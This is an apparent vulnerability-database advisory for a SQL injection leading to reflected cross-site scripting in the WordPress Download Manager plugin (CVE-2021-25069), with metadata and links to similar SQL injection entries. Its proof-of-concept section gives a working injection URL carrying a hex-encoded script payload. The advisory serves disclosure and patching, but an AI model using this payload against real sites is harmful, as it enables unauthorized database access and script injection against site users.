WordPress Plugin Vulnerabilities

WordPress Download Manager < 3.2.34 - Authenticated SQL Injection to Reflected XSS

Description

The plugin does not sanitise and escape the package_ids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpdm-stats&package_ids%5B0%5D=0%29+UNION+SELECT+1%2C0x3c2f6f7074696f6e3e3c2f73656c6563743e3c696d6720737263206f6e6572726f723d616c6572742831293e+--+p

Affects Plugins

Plugin icon
download-manager
Fixed in 3.2.34

References

CVE
CVE-2021-25069
URL
https://plugins.trac.wordpress.org/changeset/2656086

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
4ff5e638-1b89-41df-b65a-f821de8934e8

Timeline

Publicly Published
2022-01-20 (about 2 years ago)
Added
2022-01-20 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2023-12-21
Title
404 Solution < 2.35.0 - Admin+ SQLi
Published
2014-08-01
Title
WPtouch 1.9.8 - include/submit.php Multiple Parameter SQL Injection
Published
2017-06-04
Title
Event List <= 0.7.8 - Authenticated SQL Injection
Published
2022-10-10
Title
AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi
Published
2023-09-04
Title
Woocommerce Support System < 1.2.2 - Admin+ SQLi